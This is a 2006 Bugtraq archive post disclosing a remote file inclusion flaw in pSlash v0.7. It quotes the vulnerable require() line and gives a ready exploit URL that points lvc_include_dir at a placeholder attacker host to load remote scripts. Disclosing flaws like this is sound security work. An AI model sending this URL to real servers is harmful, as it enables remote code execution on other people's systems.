Bugtraq mailing list archives
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability
From: x0r0n () hotmail com
Date: 24 Aug 2006 05:30:08 -0000
############################################################ pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability ############################################################ #Author: XORON ############################################################ #Class: Remote ############################################################ #cont@ct: x0r0n[at]hotmail[dot]com ############################################################ #Code: require($lvc_include_dir.'db/db_mysql.inc.php'); ############################################################ #Exploit: http://www.site.com/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts? ############################################################ #Greetz: str0ke, Ironfist, Preddy, sakkkure ############################################################ # milw0rm.com [2006-08-23]
Current thread:
- pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability x0r0n (Aug 24)